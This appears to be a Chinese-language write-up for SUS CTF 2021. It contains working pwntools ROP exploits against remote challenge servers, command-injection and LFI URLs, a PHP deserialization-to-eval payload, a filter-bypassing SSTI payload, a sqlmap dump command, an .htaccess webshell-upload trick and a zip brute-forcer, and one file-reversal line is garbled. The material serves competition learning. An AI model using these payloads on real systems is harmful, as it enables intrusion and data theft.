WP-SUS 2021
Pwn
babyrop
#安全机制查看
pwndbg> checksec
[*] '/home/vincebye/ctf/babyrop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
#F5后的主函数
// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
int result; // eax@1
__int64 v4; // rcx@1
char buf; // [sp+0h] [bp-50h]@1
char v6; // [sp+20h] [bp-30h]@1
__int64 v7; // [sp+48h] [bp-8h]@1
v7 = *MK_FP(__FS__, 40LL);
welcome(*(_QWORD *)&argc, argv, envp);
puts("input your name:");
read(0, &buf, 0x50uLL);
puts(&buf);
puts("tell me something");
read(0, &v6, 0x50uLL);
puts("it's your secrect,keep it!");
result = 0;
v4 = *MK_FP(__FS__, 40LL) ^ v7;
return result;
}
#所需字符串的地址
6 0x00000bca 0x00400bca 7 8 .rodata ascii /bin/sh
#查询此程序相关信息
vincebye@ubuntu:~/ctf$ rabin2 -z babyrop
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x000008f8 0x004008f8 117 118 .rodata ascii .__ __ __ _____
1 0x00000970 0x00400970 118 119 .rodata ascii __ _ __ ____ | | ____ ____ _____ ____ _/ |_ ____ ______ __ __ ______ ____ _/ |_ _/ ____\\
2 0x000009e8 0x004009e8 117 118 .rodata ascii \\ \\/ \\/ /_/ __ \\ | | _/ ___\\ / _ \\ / \\ _/ __ \\ \\ __\\/ _ \\ / ___/| | \\/ ___/_/ ___\\\\ __\\\\ __\\
3 0x00000a60 0x00400a60 119 120 .rodata ascii \\ / \\ ___/ | |__\\ \\___( <_> )| Y Y \\\\ ___/ | | ( <_> ) \\___ \\ | | /\\___ \\ \\ \\___ | | | |
4 0x00000ad8 0x00400ad8 117 118 .rodata ascii \\/\\_/ \\___ >|____/ \\___ >\\____/ |__|_| / \\___ > |__| \\____/ /____ >|____//____ > \\___ >|__| |__|
5 0x00000b50 0x00400b50 117 118 .rodata ascii \\/ \\/ \\/ \\/ \\/ \\/ \\/
6 0x00000bca 0x00400bca 7 8 .rodata ascii /bin/sh
7 0x00000bd3 0x00400bd3 16 17 .rodata ascii input your name:
8 0x00000be4 0x00400be4 17 18 .rodata ascii tell me something
9 0x00000bf6 0x00400bf6 26 27 .rodata ascii it's your secrect,keep it!
vincebye@ubuntu:~/ctf$ rabin2 -i babyrop
[Imports]
nth vaddr bind type lib name
―――――――――――――――――――――――――――――――――――――
1 0x004005c0 GLOBAL FUNC puts
2 0x004005d0 GLOBAL FUNC __stack_chk_fail
3 0x004005e0 GLOBAL FUNC system
4 0x004005f0 GLOBAL FUNC read
5 0x00400600 GLOBAL FUNC __libc_start_main
6 0x00000000 WEAK NOTYPE __gmon_start__
7 0x00400610 GLOBAL FUNC setvbuf
vincebye@ubuntu:~/ctf$ rabin2 -qs babyrop |grep -ve imp -e ' 0 '
0x00601060 8 stdout
0x00601070 8 stdin
0x00601080 8 stderr
0x00601088 1 completed.7594
0x00601058 8 hint
0x004008e0 2 __libc_csu_fini
0x00601060 8 stdout@@GLIBC_2.2.5
0x00601070 8 stdin@@GLIBC_2.2.5
0x004007c2 21 vlun
0x00400726 156 welcome
0x004008f0 4 _IO_stdin_used
0x00400870 101 __libc_csu_init
0x00400630 42 _start
0x004007d7 151 main
0x00601080 8 stderr@@GLIBC_2.2.5
vincebye@ubuntu:~/ctf$ ROPgadget --binary babyrop --only "pop|ret" |grep rdi
0x00000000004008d3 : pop rdi ; ret
pwndbg> disassemble vlun
Dump of assembler code for function vlun:
0x00000000004007c2 <+0>: push rbp
0x00000000004007c3 <+1>: mov rbp,rsp
0x00000000004007c6 <+4>: mov edi,0x400bc6
0x00000000004007cb <+9>: mov eax,0x0
0x00000000004007d0 <+14>: call 0x4005e0 <system@plt>
0x00000000004007d5 <+19>: pop rbp
0x00000000004007d6 <+20>: ret
End of assembler dump.
#位置信息
v6位置RBP-30h
buf位置rbp-50h
canary的位置rbp-8h
v6偏移0x28处为canary
buf偏移0x48处canary
最终payload
from pwn import *
p = remote('39.108.208.104', 2222)
#p = process('./babyrop')
payload = b"A" * 0x48
p.sendlineafter("input your name:", payload)
p.recvuntil(b"A" * 0x48 + b'\\n')
canary = u64(p.recv(7).rjust(8, b'\\x00'))
print ("canary=>" +hex(canary))
payload=b'A'*0x28+p64(int(canary))+b'B'*8+p64(0x00000000004008d3)+p64(0x00400bca)+p64(0x00000000004007d0)
p.sendlineafter("tell me something\\n", payload)
p.interactive()
babyStack
pwndbg> cyclic -l kaaa
40
vincebye@ubuntu:~/ctf$ rabin2 -z stack
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x000007f4 0x004007f4 7 8 .rodata ascii /bin/sh
1 0x000007fc 0x004007fc 18 19 .rodata ascii welcom to sus ctf!
2 0x0000080f 0x0040080f 19 20 .rodata ascii input your payload!
vincebye@ubuntu:~/ctf$ rabin2 -i stack
[Imports]
nth vaddr bind type lib name
―――――――――――――――――――――――――――――――――――――
1 0x00400560 GLOBAL FUNC puts
2 0x00400570 GLOBAL FUNC system
3 0x00400580 GLOBAL FUNC read
4 0x00400590 GLOBAL FUNC __libc_start_main
5 0x00000000 WEAK NOTYPE __gmon_start__
6 0x004005a0 GLOBAL FUNC setvbuf
vincebye@ubuntu:~/ctf$ rabin2 -qs stack | grep -ve imp -e ' 0 '
0x00601060 8 stdout
0x00601070 8 stdin
0x00601080 8 stderr
0x00601088 1 completed.7594
0x004007e0 2 __libc_csu_fini
0x00601060 8 stdout@@GLIBC_2.2.5
0x00601070 8 stdin@@GLIBC_2.2.5
0x004007f0 4 _IO_stdin_used
0x00400770 101 __libc_csu_init
0x004005c0 42 _start
0x004006cb 152 main
0x004006b6 21 shell
0x00601080 8 stderr@@GLIBC_2.2.5
pwndbg> checksec
[*] '/home/vincebye/ctf/stack'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
vincebye@ubuntu:~/ctf$ ROPgadget --binary stack --only "pop|ret" |grep rdi
0x00000000004007d3 : pop rdi ; ret
pwndbg> disassemble shell
Dump of assembler code for function shell:
0x00000000004006b6 <+0>: push rbp
0x00000000004006b7 <+1>: mov rbp,rsp
0x00000000004006ba <+4>: mov edi,0x4007f4
0x00000000004006bf <+9>: mov eax,0x0
0x00000000004006c4 <+14>: call 0x400570 <system@plt>
0x00000000004006c9 <+19>: pop rbp
0x00000000004006ca <+20>: ret
End of assembler dump.
from pwn import *
#p=process("./stack")
p=remote('39.108.208.104',2225)
payload=b'a'*40
payload+=p64(0x00000000004007d3)
payload+=p64(0x004007f4)
payload+=p64(0x00000000004006c4)
p.sendlineafter("input your payload!\\n",payload)
p.interactive()
babync
nc上去ls然后cat就行
babyida_pwn
IDA一键F5
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+0h] [rbp-10h] BYREF
int v5; // [rsp+4h] [rbp-Ch]
unsigned __int64 v6; // [rsp+8h] [rbp-8h]
v6 = __readfsqword(0x28u);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stderr, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
v5 = 2222;
do
{
puts("give me your code:");
__isoc99_scanf("%d", &v4);
}
while ( v5 != v4 );
return system("/bin/sh");
}
输入2222然后拿到shell
Crypto
babyFlower
https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo处解密得到
HFHXGU
http://www.hiencode.com/atbash.html处解密得到
susctf{h3llo_crypt0~}
再根据HFHXGU{S3ool_XIBKG0~}的大小写转换大小写得到flag
社会主义核心价值观
http://www.hiencode.com/cvencode.html直接解密
Web
justeval
<http://223.3.85.86:11445/index.php?a=include$_GET[b]?%3E&b=php://filter/read=convert.base64-encode/resource=flag.php>
asoul.icu
import requests
res=requests.get('<http://223.3.85.86:10010>')
print(str(res.content,'utf-8'))
直接请求,然后在回包中搜索
something about basic
www-data权限
<http://223.3.85.86:10715/index.php?a=system(%27find%20/%20-perm%20-u=s%20-type%20f%202%3E/dev/null%27)>;
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/bin/umount
/bin/mount
/bin/su
/cat
<http://223.3.85.86:10715/index.php?a=system(%27/cat%20../../../flag%27)>;
SUSCTF{a0352b2ac01455c7244e2758e13373d5}
PHP Noob
<?php
class Start
{
public $chain;
public function __construct()
{
$this->chain=new End;
}
function __destruct()
{
echo $this->chain;
}
}
class End{
public $cmd;
public function __construct()
{
$this->cmd=system('ls');
}
function __toString(){
return eval($this->cmd);
}
}
$a=new Start;
echo urlencode(serialize($a));
?>
SUSCTF
<http://223.3.85.86:13870/index.php?data=O%3A5%3A%22Start%22%3A1%3A%7Bs%3A5%3A%22chain%22%3BO%3A3%3A%22End%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A28%3A%22system%28%27cat+..%2F..%2F..%2Fflag%27%29%3B%22%3B%7D%7D>
PS:注意eval中的为php语句需要加一个;
修改payload中的__toString()函数不会影响结果
payload
<?php
class Start
{
public $chain;
public function __construct()
{
$this->chain=new End;
}
function __destruct()
{
echo $this->chain;
}
}
class End{
public $cmd;
public function __construct()
{
$this->cmd='system(\\'cat ../../../flag\\');';
}
function __toString(){
return eval($this->cmd);
}
}
$a=new Start;
echo urlencode(serialize($a));
?>
easy sql
sqlamp一键跑
copy
F12
SUSCTF
Bind SQL
python sqlmap.py -u "<http://106.15.53.153:10012>" --forms -D ctf -T users -C password,username --dump
+---------------------------+----------+
| admin | admin |
| z33_is_z3ratu1 | z33 |
| GUEST_is_GUEST | GUEST |
| daieren_is_shenxian | daieren |
| lgw_wudi! | lgw |
| lmy_wudi! | lmy |
| k1ee_is_yeye | klee |
| SUSCTF{th1s_1s_y0ur_flag} | flag |
+---------------------------+----------+
SUSCTF
easy_upload
构建.htaccess
<FilesMatch "shana">
SetHandler application/x-httpd-php
</FilesMatch>
禁用JS
构建图片马一句话,然后上传
SUSCTF
easy_robot
http://223.3.85.86:15643/robots.txt
http://223.3.85.86:15643/flag_is_not_h3re.php
abnormal_ssti
过滤关键词
bases class mro
PS:用[]绕过过滤的时候不需要.
{{''['__cla'+'ss__']['__ba'+'ses__'][0]['__subc'+'lasses__']()[100].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")}}
最终:
{{''['__cla'+'ss__']['__ba'+'ses__'][0]['__subc'+'lasses__']()[100].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat ../../../flag').read()")}}
SUSCTF
Re
点开就送
IDA打开
53h ; 'S'
mov [rbp+var_6C], 55h ; 'U'
mov [rbp+var_68], 53h ; 'S'
mov [rbp+var_64], 43h ; 'C'
mov [rbp+var_60], 54h ; 'T'
mov [rbp+var_5C], 46h ; 'F'
mov [rbp+var_58], 7Bh ; '{'
mov [rbp+var_54], 53h ; 'S'
mov [rbp+var_50], 6Fh ; 'o'
mov [rbp+var_4C], 6Fh ; 'o'
mov [rbp+var_48], 6Fh ; 'o'
mov [rbp+var_44], 5Fh ; '_'
mov [rbp+var_40], 65h ; 'e'
mov [rbp+var_3C], 61h ; 'a'
mov [rbp+var_38], 73h ; 's'
mov [rbp+var_34], 79h ; 'y'
mov [rbp+var_30], 7Dh ; '}'
SUSCTF
babyre
.data:0000000000601060 aa_tql db 73h ; DATA XREF: main+F6↑r
.data:0000000000601061 db 6
.data:0000000000601062 db 75h ; u
.data:0000000000601063 db 16h
.data:0000000000601064 db 62h ; b
.data:0000000000601065 db 4
.data:0000000000601066 db 7Fh ;
.data:0000000000601067 db 1Ch
.data:0000000000601068 db 74h ; t
.data:0000000000601069 db 21h ; !
.data:000000000060106A db 7Eh ; ~
.data:000000000060106B db 0Ah
.data:000000000060106C db 3Bh ; ;
.data:000000000060106D db 64h ; d
.data:000000000060106E db 2Ch ; ,
.data:000000000060106F db 6Dh ; m
.data:0000000000601070 db 5Dh ; ]
.data:0000000000601071 db 2
.data:0000000000601072 db 6Eh ; n
.data:0000000000601073 db 5Dh ; ]
.data:0000000000601074 db 14h
.data:0000000000601075 db 4Bh ; K
.data:0000000000601076 db 2Ah ; *
.data:0000000000601077 db 57h ; W
代码
a=[0x73,0x06,0x75,0x16,0x62,
0x04,0x7F,0x1C,0x74,0x21,0x7E,0x0A,0x3B,0x64,
0x2C,0x6D,0x5D,0x02,0x6E,0x5D,0x14,0x4B,0x2A,0x57]
s=''
s+='s'
for i in range(1,len(a)):
s+=chr(a[i]^a[i-1])
print(s)
ss=''
for i in s:
if ord(i)>64 and ord(i)<=90:
ss=ss+chr(ord(i)+32)
elif ord(i)>96 and ord(i)<=122:
ss=ss+chr(ord(i)-32)
else:
ss=ss+i
print(ss)
SUSCTF
whitegive
打开文件搜索字符串,在这是一道非常简单的逆向题处下断点
jg改成jl
就拿到了
eeeasyre
先用upx脱壳 ,然后用IDA修改了ecx的值为1
然后保存,放进x64dbg,搜索字符串Yeah,you know下断点,然后运行到字符串处,然后一直f8单步调试就出来了
babyida
MISC
签到
按照WP做的
悲惨世界
doc隐写打开隐藏字符获得
jscode=[20,83,85,83,67,84,70,20,16, 188, 16, 68, 79, 67, 16, 73, 85, 8, 51, 16, 85, 78, 68, 69, 82, 20, 89, 20, 79, 85, 82, 16, 75, 96, 8, 69, 37, 78, 69, 39, 16, 110]
再根据网上js code查表得SUSCTF
# 65-90 a-z
# 20 case
# 83 s
# 85 u
# 67 c
# 84 try
# 70 f
# 16 shift
# 188 comma
# 16 shift
# 68 d
# 79 o
# 8 backspace
# s u s c t f
20,83,85,83,67,84,70,20,->SUSCTF
16, 188, 16, 68, 79, 67, 16, 73, 85,{DocIu
8, 51, 16, 85, 78, 68, 消3Und
69, 82, 20, 89, 20, 79, 85, 82,erYour
16, 75, 96, 8, 69, 37, 78, 69, 39, 16, 110 Ke<ne>}
SUSCTFDOCIUUNDERYOURKENE
SUSCTF{DocI3UnderYourKnee}
ss=''
for i in jscode:
if i>=65 and i<=90:
ss=ss+chr(i)
print(ss)
what
首先查看文件最后发现了gnp,想着是png倒置
with open('flag','rb') as f1, open('flag.png','wb') as f2:
f2.write-1]
利用脚本得到图片
tweakpng打开提醒crc码不对
利用下面的脚本得到正确的图片大小
import os
import binascii
import struct
crcbp = open("xxx.png", "rb").read() #打开图片
for i in range(2000):
for j in range(2000):
data = crcbp[12:16] + \\
struct.pack('>i', i)+struct.pack('>i', j)+crcbp[24:29]
crc32 = binascii.crc32(data) & 0xffffffff
if(crc32 == 0x3747440b): #图片当前CRC
print(i, j)
print('hex:', hex(i), hex(j))
640 1138
hex: 0x280 0x472
然后利用010修改图片的大小
得到S
再根据栅栏密码解密得到
SUSCTF
脚本小子
from pwn import *
context.log_level = 'debug'
def analyse_data(data):
print(type(data))
result=''
symbols=['+', '-', '*']
flag='='
if flag in data:
temp1=data.split('=')
for j in symbols:
if j in temp1[0]:
thisflag=j
temp=temp1[0].split(thisflag)
num1=temp[0]
num2=temp[1]
if thisflag =='*':
result=int(num1)*int(num2)
elif thisflag =='+':
result=int(num1)+int(num2)
elif thisflag =='-':
result=int(num1)-int(num2)
return result
p=process("./pwntools")
#p=remote('39.108.208.104',2225)
payload=p64(11451409)
p.sendlineafter("Give me the magic number :)",payload)
a=p.recvuntil('Complete 1000 math questions in 90 seconds!!!\\n')
print(a)
while True:
print('loop')
question=p.recvuntil('?')
if question!=b'\\n' and question:
print(question)
question=str(question, encoding = "utf-8")
print('question')
print(question)
result1=analyse_data(question)
print('analysed')
print(result1)
if result1:
print(1)
if len(str(result1))!=0:
print(2)
p.send(str(result1))
print('sended')
SUSCTF{caae1895c78453660a6981837998e9a8}
温,温柔点
import zipfile
import os
import time
import sys
os.chdir(r'I:\\BaiduNetdiskDownload\\wrd')
start_time = time.time()
# 获取zip文件
def get_zipfile():
files = os.listdir()
for file in files:
if file.endswith('.zip'):
return file
# 用来提取zip文件
def extract():
file = get_zipfile()
with open('dic', 'r') as f:
for i in f.readlines():
zfile = zipfile.ZipFile(file) # 读取压缩文件
try:
pwd = str(i.strip('\\n'))
zfile.extractall(path='.', pwd=pwd.encode('utf-8'))
print('解压密码是:', pwd)
end_time = time.time()
print('单线程破解压缩包花了%s秒' % (end_time - start_time))
sys.exit(0) # 让程序在得到结果后,就停止运行,正常退出
except Exception as e:
pass
if __name__ == "__main__":
extract()
利用这个脚本,根据提供的字典进行爆破
解压密码是: 1q2w3e4r5tyuiop 单线程破解压缩包花了7.111937761306763秒
然后拿到图片,flag在图片上